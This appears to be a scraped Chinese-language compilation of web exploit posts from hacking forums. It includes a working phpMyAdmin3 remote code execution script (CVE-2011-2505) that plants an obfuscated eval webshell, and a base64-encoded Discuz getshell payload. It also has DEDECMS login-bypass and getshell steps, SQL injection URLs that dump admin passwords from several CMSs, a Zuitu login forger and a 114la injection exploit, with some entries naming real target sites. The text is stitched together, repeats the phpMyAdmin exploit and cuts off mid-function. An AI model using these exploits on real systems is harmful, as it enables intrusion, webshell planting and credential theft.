phpMyAdmin3 remote code execute php版本 exploit
来源:http://www.oldjun.com/blog/index.php/archives/81/
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');
/**
* working when the directory:"config" exists and is writeable.
**/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
exit;
}
$host = $argv[1];
$path = $argv[2];
/**
* Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
exit("[-] Exploit Failed! The directory:config do not exists!\n");
}
/**
* Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
echo "[+] token:$token\n";
echo "[+] Session ID:$sessionid\n";
}else{
exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}
/**
* Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
/**
* Try to create webshell
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
/**
* Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
echo "[+] Congratulations! Expoilt successfully....\n";
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}
function php_request($url,$data='',$cookie=''){
global $host, $path;
$method=$data?'POST':'GET';
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
$packet .= "Accept: */*\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$packet .= "Host: $host\r\n";
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
$packet .= $cookie?"Cookie: $cookie\r\n":"";
$packet .= "Connection: Close\r\n\r\n";
$packet .= $data?$data:"";
$fp = fsockopen(gethostbyname($host), 80);
if (!$fp) {
echo 'No response from '.$host; die;
}
fputs($fp, $packet);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
return $resp;
}
?> PJBlog 3.2.9.518 getwebshell 漏洞
作者:不走的钟
PHPmyadmin 2.11.4万能密码漏洞
PHPmyadmin 2.11.4
PHPmyadmin 2.11.3
两个版本都有此漏洞
我去测试了一下 确实可以用。。。
给你找到一个测试网址http://www.hitag.cn
你们可以试一下
只需要输入账号 密码不需要输入
利用代码如下:
‘localhost’@'@”
http://www.cnyzy.cn/blogview.asp?logID=1840
Discuz!X2.5 Release 20120407 Getshell 0day
影响版本有:20120407,beta,rc - 专注信息安全( a. E* C! }% B4 U
1.注册任意账户 90 Security Team, B5 t8 Y$ K2 g% q! f+ L
2.登陆用户,发表blog日志(注意是日志) 9 g& r4 t9 z7 j- r
这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台!5 {" |0 U& u: T5 @
3.添加图片,选择网络图片,地址:{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
我们90sec所有成员的技术分享平台! l; x+ b5 p: T* J+ U' |' ~
4.访问日志,论坛根目录下生成demo.php,一句发密c
Ngnix空子节可远程执行代码漏洞
摘自微博:
Ngnix 出现高危漏洞,可远程执行代码:Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问 xxx.jpg%00.php来执行其中的代码。影响版本:0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37。www.t00ls.net, S% v1 o$ M i
Security1 M" v2 A) v7 S+ K$ M
R, W
详细参考:
https://nealpoole.com/blog/2011/07/possible-arbitrary-code-execution-with-null-bytes-php-and-old-versions-of-nginx/
DEDECMS爆严重安全漏洞 免账号密码直接进入后台
众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”
入侵步骤如下:http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面红色字母改为当前的验证码,即可直接进入网站后台。
小编分析了一下,此漏洞的前提是必须得到后台路径才能实现,因此大家一定要养成使用DEDECM建站时改后台名字的习惯。下面给出官方的解决办法:
解决办法:
找到include/common.inc.php文件,把
foreach($_REQUEST as $_k=>$_v)
{
var_dump($_k);
if( strlen($_k)>0 && preg_match(‘#^(cfg_|GLOBALS)#’,$_k) )
{
exit(‘Request var not allow!’);
}
}
换成
//检查和注册外部提交的变量
function CheckRequest(&$val) {
if (is_array($val)) {
foreach ($val as $_k=>$_v) {
CheckRequest($_k);
CheckRequest($val[$_k]);
}
} else
{
if( strlen($val)>0 && preg_match(‘#^(cfg_|GLOBALS)#’,$val) )
{
exit(‘Request var not allow!’);
}
}
}
CheckRequest($_REQUEST);
===============================================================
By:jannock
漏洞细节已经传遍了(http://www.t00ls.net/thread-17354-1-1.html,http://lcx.cc/?FoxNews=1681.html),又没得玩了。
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell。
前题条件,必须准备好自己的dede数据库,然后插入数据:
以下是引用片段:
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'<?php eval($_POST[c]) ?>\');echo "OK";@fclose($fp);{/dede:php}');
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
以下是引用片段:
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
從核攻擊哪裡搞過來的。
foosun 0day 最新注入漏洞
风讯foosun的注册文件存在漏洞。黑客们可以暴管理员帐号和密码。
漏洞文件:www.xxx.com/user/SetNextOptions.asp
利用简单的方法:
暴管理员帐号:
http://www.xxx.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
暴管理员密码:
http://www.xxx.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin
如果得不到密码黑阔们也可以考虑 update 。。。很邪恶喔。。哈
科讯kesion 6.x - 7.06 第二枚注射漏洞
作者:goingta
网站:www.zzfhw.com
哎 那个心酸啊
还是自己找一个吧
希望没有闲言闲语
报告官方只是觉得人家做这么大怎么样都会有面子问题
要是xx非主流去给挂个黑页比较难为情
不解释了 。。。。
因为第一枚在user目录下面 很容易被一些网站把这个目录给删除了
刚好朋友今天遇到一个没有第一枚那个文件了
于是发出来给大家玩玩
科讯 6.x - 7.06 SQL 注射漏洞
作者:goingta www.t00ls.net
网站:http://www.zzfhw.com
某日逛t00ls.net的时候 看到论坛图片随机显示哪里有一张 标题为 科讯 6.x - 7.06 SQL 注射漏洞 - 低调求发展
点进去看 原来核心会员们又在xxoo
我没权限看 自然是看不了了
仔细看下图片 - 低调求发展
暴露了存在漏洞的文件名
于是自己也下一套下来看了下
刚学asp 不是很精通
后来还是成功爆出账户密码
拿去官方测试,也还存在
漏洞通知官方,已补。
不敢私藏,分享一下
非主流黑客别用来修改人家主页啊,没得前途
http://www.zzfhw.com/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500
============================================================================
author:my5t3rywww.t00ls.net! B6 F$ d9 r1 U! s0 H x a; |
转载请注明:t00ls.net
漏洞位于注册页面的\User\Reg\RegAjax.asp 中的24 - 46行 和 254 -270 行 代码如下:01 Class Ajax_Check
02 Private KS
03 Private Sub Class_Initialize()
04 Set KS=New PublicCls
05 End Sub
06 Private Sub Class_Terminate()
07 Set KS=Nothing
08 End Sub
09 Public Sub Kesion()
10
11 Select Case KS.S("Action")
12 Case "checkusername"
13 Call CheckUserName()
14 Case "checkemail"
15 Call CheckEmail()
16 Case "checkcode"
17 Call CheckCode()
18 Case "getregform"
19 Call GetRegForm()
20 Case "getcityoption"
21 Call getCityOption()
22 End Select
23 End Sub
24
25 ……略去无关代码
26
27 Sub getCityOption()
28 Dim Province,XML,Node
29 Province=UnEscape(KS.S("Province")) //注意这里
30 Dim RS:Set RS=Server.CreateObject("ADODB.RECORDSET")
31 RS.Open "Select top 200 a.ID,a.City From KS_Province a Inner Join KS_Province b On A.ParentID=B.ID Where B.City='" & Province & "' order by a.orderid,a.id",conn,1,1
32 If Not RS.Eof Then
33 Set XML=KS.RsToXml(Rs,"row","")
34 End If
35 RS.Close : Set RS=Nothing
36 If IsObject(XML) Then
37 For Each Node In XML.DocumentElement.SelectNodes("row")
38 KS.Echo "<option value=""" & node.SelectSingleNode("@city").text &""">" & node.SelectSingleNode("@city").text &"</option>"
39 Next
40 End If
41 Set XML=Nothing
42 End Sub
43 End Class
01 Class Ajax_Check
02 Private KS
03 Private Sub Class_Initialize()
04 Set KS=New PublicCls
05 End Sub
06 Private Sub Class_Terminate()
07 Set KS=Nothing
08 End Sub
09 Public Sub Kesion()
10
11 Select Case KS.S("Action")
12 Case "checkusername"
13 Call CheckUserName()
14 Case "checkemail"
15 Call CheckEmail()
16 Case "checkcode"
17 Call CheckCode()
18 Case "getregform"
19 Call GetRegForm()
20 Case "getcityoption"
21 Call getCityOption()
22 End Select
23 End Sub
24
25 ……略去无关代码
26
27 Sub getCityOption()
28 Dim Province,XML,Node
29 Province=UnEscape(KS.S("Province")) //注意这里
30 Dim RS:Set RS=Server.CreateObject("ADODB.RECORDSET")
31 RS.Open "Select top 200 a.ID,a.City From KS_Province a Inner Join KS_Province b On A.ParentID=B.ID Where B.City='" & Province & "' order by a.orderid,a.id",conn,1,1
32 If Not RS.Eof Then
33 Set XML=KS.RsToXml(Rs,"row","")
34 End If
35 RS.Close : Set RS=Nothing
36 If IsObject(XML) Then
37 For Each Node In XML.DocumentElement.SelectNodes("row")
38 KS.Echo "<option value=""" & node.SelectSingleNode("@city").text &""">" & node.SelectSingleNode("@city").text &"</option>"
39 Next
40 End If
41 Set XML=Nothing
42 End Sub
43 End Class
以上代码中的Province=UnEscape(KS.S("Province")) 调用自定义函数KS.S进行过滤,接着又调用UnEscape函数解码! - 低调求发展" Q8 @/ Z( n/ x6 H- m
- 低调求发展' R8 t! h+ Y0 C5 T
其中KS.S 函数 与UnEscape函数 原型如下:01 Function DelSql(Str)
02 Dim SplitSqlStr,SplitSqlArr,I
03 SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell"
04 SplitSqlArr = Split(SplitSqlStr,"|")
05 For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)
06 If Instr(LCase(Str),SplitSqlArr(I))>0 Then
07 Die "<script>alert('系统警告!\n\n1、您提交的数据有恶意字符" & SplitSqlArr(I) &";\n2、您的数据已经被记录;\n3、您的IP:"&GetIP&";\n4、操作日期:"&Now&";\n Powered By Kesion.Com!');window.close();</script>"
08 End if
09 Next
10 DelSql = Str
11 End Function
12 '取得Request.Querystring 或 Request.Form 的值
13 Public Function S(Str)
14 S = DelSql(Replace(Replace(Request(Str), "'", ""), """", ""))
15 End Function
01 Function DelSql(Str)
02 Dim SplitSqlStr,SplitSqlArr,I
03 SplitSqlStr="dbcc|alter|drop|*|and |exec|or |insert|select|delete|update|count |master|truncate|declare|char|mid|chr|set |where|xp_cmdshell"
04 SplitSqlArr = Split(SplitSqlStr,"|")
05 For I=LBound(SplitSqlArr) To Ubound(SplitSqlArr)
06 If Instr(LCase(Str),SplitSqlArr(I))>0 Then
07 Die "<script>alert('系统警告!\n\n1、您提交的数据有恶意字符" & SplitSqlArr(I) &";\n2、您的数据已经被记录;\n3、您的IP:"&GetIP&";\n4、操作日期:"&Now&";\n Powered By Kesion.Com!');window.close();</script>"
08 End if
09 Next
10 DelSql = Str
11 End Function
12 '取得Request.Querystring 或 Request.Form 的值
13 Public Function S(Str)
14 S = DelSql(Replace(Replace(Request(Str), "'", ""), """", ""))
15 End Function
01 Function UnEscape(str)
02 Dim x
03 x=InStr(str,"%")
04 Do While x>0
05 UnEscape=UnEscape&Mid(str,1,x-1)
06 If LCase(Mid(str,x+1,1))="u" Then
07 UnEscape=UnEscape&ChrW(CLng("&H"&Mid(str,x+2,4)))
08 str=Mid(str,x+6)
09 Else
10 UnEscape=UnEscape&Chr(CLng("&H"&Mid(str,x+1,2)))
11 str=Mid(str,x+3)
12 End If
13 x=InStr(str,"%")
14 Loop
15 UnEscape=UnEscape&str
16 End Function
01 Function UnEscape(str)
02 Dim x
03 x=InStr(str,"%")
04 Do While x>0
05 UnEscape=UnEscape&Mid(str,1,x-1)
06 If LCase(Mid(str,x+1,1))="u" Then
07 UnEscape=UnEscape&ChrW(CLng("&H"&Mid(str,x+2,4)))
08 str=Mid(str,x+6)
09 Else
10 UnEscape=UnEscape&Chr(CLng("&H"&Mid(str,x+1,2)))
11 str=Mid(str,x+3)
12 End If
13 x=InStr(str,"%")
14 Loop
15 UnEscape=UnEscape&str
16 End Function
这里编码出现混乱,产生了与php的二次编码类似的漏洞,利用比较简单,可以union:
http://localhost/user/reg/regajax.asp?action=getcityoption&province=%2527%2520%2575%256e%2569%256f%256e%2520%2553%2565%256c%2565%2563%2574%2520%2574%256f%2570%2520%2531%2530%2520%2541%2564%256d%2569%256e%2549%2544%252c%2555%2573%2565%2572%254e%2561%256d%2565%2526%2563%2568%2572%2528%2531%2532%2534%2529%2526%2550%2561%2573%2573%2557%256f%2572%2564%2520%2546%2572%256f%256d%2520%254b%2553%255f%2541%2564%256d%2569%256e%2500
Security3 I! Y& Y3 Z/ K; U I
上面的利用针对ACCESS,MSSQL需要改下SQL语句:1 <?php
2 $str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
3 for ($i=0; $i<=strlen($str); $i++){
4 $temp .= "%25".base_convert(ord($str[$i]),10,16);
5 }
6 echo $temp."0";
7 ?>
1 <?php
2 $str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
3 for ($i=0; $i<=strlen($str); $i++){
4 $temp .= "%25".base_convert(ord($str[$i]),10,16);
5 }
6 echo $temp."0";
7 ?>
修改' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin为相应的SQL语句即可。(MSSQL直接备份差异比较方便)
因为解码的时候进行了CLng类型转换,提交字符可以使其报错从而爆出物理路径 - 低调求发展9 @# p( E" u% a3 l
爆物理路径:http://localhost/user/reg/regajax.asp?action=getcityoption&province=%25i
东西压了一年了 现在很多人都有了 听说前两天还有个黑客因为搞这个被河蟹了。。
- - 默哀 看看就好了。。
Security5 ]% ]% j2 H2 X* W! R4 B3 y s$ {
第一个是上传漏洞 此漏洞在6月份出的新版本中已经得到修复 - 低调求发展! }7 O: B0 _* W$ F: Z) a
最土自己写了upload_image上传函数 本身挺安全的Security4 o$ w1 l2 G! e: J2 X( d
但是upload.php没有用这个函数www.t00ls.net8 s- g, y& d# N h
第25行
$upext='txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3,mid';
复制代码
第65行
$fileinfo=pathinfo($upfile['name']);
$extension=strtolower($fileinfo['extension']);
if(preg_match('/'.str_replace(',','|',$upext).'/i',$extension))
{
$filesize=$upfile['size'];
if($filesize > $maxattachsize)$err='文件大小超过'.$maxattachsize.'字节';
else
{
$year = date('Y');
$day = date('md');
$n = time().rand(1000,9999).'.jpg';
$attach_dir = IMG_ROOT . "/team/{$year}/{$day}";
RecursiveMkdir( IMG_ROOT . "/team/{$year}/{$day}" );
$fname= time().rand(1000,9999).'.'.$extension;
$target = $attach_dir.'/'.$fname;
if ( is_resource($upfile['tmp_name']) ) {
$data = fread($upfile['tmp_name'], $filesize);
file_put_contents($target, $data);
fclose($upfile['tmp_name']);
复制代码
//正则匹配用户提交文件的后缀 只要包含白名单就OKwww.t00ls.net {) T- t. [8 ~
最后保存的文件后缀是以用户提交为准而不是$n 利用iis6文件解析的特性 导致漏洞产生
- 低调求发展. ~6 N2 K3 x3 j# y
第二个是UC_key未初始化漏洞 此类漏洞在很多小程序里都有www.t00ls.net5 L. f9 |) Y/ d8 n( }
由于UCkey未初始化导致访问者可以随意调用uc接口的各种函数
其中包括自动登陆 修改密码
这里给个任意用户登陆的POC
<?php
print_r('
---------------------------------------
Zuitu UC_key Uninitialized Vul Exploit
By xZL
Team: www.0kee.com
2010.10.01
---------------------------------------
');
if ($argc < 2) {
print_r('
Usage: php '.$argv[0].' username
username: the admin username
Example: php '.$argv[0].' admin
');
die();
}
error_reporting(0);
$username = $argv[1];
$key = '';
$code = 'time=11111111111&username='.$username.'&action=synlogin';
$x = urlencode(authcode($code, "ENCODE", $key));
print_r('Plz copy this code~~ enjoy it~~ ^_^
/api/uc.php?code='.$x);
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
}
?>
114啦网址导航留言本注入
漏洞文件 feedback/feedback.php
影响版本 <=1.5
$username = empty($_POST['username']) ? '' : strip_tags(iconv('UTF-8', 'GBK', $_POST['username']));
$email = (isset($_POST['email'])) ? strip_tags(iconv('UTF-8', 'GBK', $_POST['email'])) : '';
$content = (isset($_POST['content'])) ? trim(iconv('UTF-8', 'GBK', $_POST['content'])) : '';
(empty($content)) && $error_msg .= ',意见及建议 ';
if (!empty($error_msg))
{
throw new Exception($error_msg, 11);
}
$content = htmlspecialchars($content, ENT_QUOTES);
if (strlen($content) > 600 || strlen($content) < 40)
{
throw new Exception('请将您的描述控制在 20 - 300 字,更多内容请您分次提交。', 1);
}
// 验证次数
$old_cookie = (isset($_COOKIE['fdnum'])) ? (int)$_COOKIE['fdnum'] : 0;
if ($old_cookie >= SUBMIT_ONE_DAY)
{
throw new Exception('抱歉,24 小时内您只能提交 ' . SUBMIT_ONE_DAY . ' 次反馈信息。谢谢合作!', 2);
}
$old_cookie++;
if (false === app_db::insert('ylmf_feedback', array('username', 'email', 'content', 'add_time'),
array($username, $email, $content, time())))
{
throw new Exception('抱歉,信息提交失败,请重试。', 1);
}
else
{
// 记录提交次数
if ($old_cookie > SUBMIT_ONE_DAY || !isset($_COOKIE['fdstime']) || $_COOKIE['fdstime'] < 1)
{
setcookie('dfstime', time(), time() + 86400);
setcookie('fdnum', $old_cookie, time() + 86400);
}
else
{
setcookie('fdnum', $old_cookie, time() + 86400 - (time() - $_COOKIE['fdstime']));
}
throw new Exception('<div class="success">提交成功,感谢您的反馈! <a href="'. URL .'/">返回首页</a></div>', 3);
unset($username, $email, $content);
}
复制代码
$username、$email、$content强制转换GBK编码但是均未过滤直接insert 构造UTF8宽字符形成宽字符注入 - 低调求发展( \ s& v1 u: u0 f0 r
EXP
<?php
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
2011.04.02
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
print_r($sbcopyright);
die();
}
ob_start();
$url = $argv[1];
$path= $argv[2];
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
$data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";
fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1\r\n");
fwrite($sock, "Accept: */*\r\n");
fwrite($sock, "Referer: http://$url/#M\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
fwrite($sock, "User-Agent: Mozilla\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
fwrite($sock, "Connection: Keep-Alive\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
fwrite($sock, "Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON\r\n\r\n");
fwrite($sock, $data);
$headers = "";
while ($str = trim(fgets($sock, 4096)))
$headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
$body .= fgets($sock, 4096);
fclose($sock);
if (strpos($body, 'Duplicate entry') !== false) {
preg_match('/Duplicate entry \'(.*)1\'/', $body, $arr);
$result=explode("_",$arr[1]);
print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\nGood Luck!");
}else{
print_r("Exploit Failed! \n");
}
ob_end_flush();
?>
phpMyAdmin3 remote code execute php版本 exploit
来源:http://www.oldjun.com/blog/index.php/archives/81/
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');
/**
* working when the directory:"config" exists and is writeable.
**/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
exit;
}
$host = $argv[1];
$path = $argv[2];
/**
* Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
exit("[-] Exploit Failed! The directory:config do not exists!\n");
}
/**
* Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
echo "[+] token:$token\n";
echo "[+] Session ID:$sessionid\n";
}else{
exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}
/**
* Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
/**
* Try to create webshell
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
/**
* Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
echo "[+] Congratulations! Expoilt successfully....\n";
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}
function php_request($url,$data='',$cookie=''){
global $host, $path;
$method=$data?'POST':'GET';
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
$packet .= "Accept: */*\r\n";
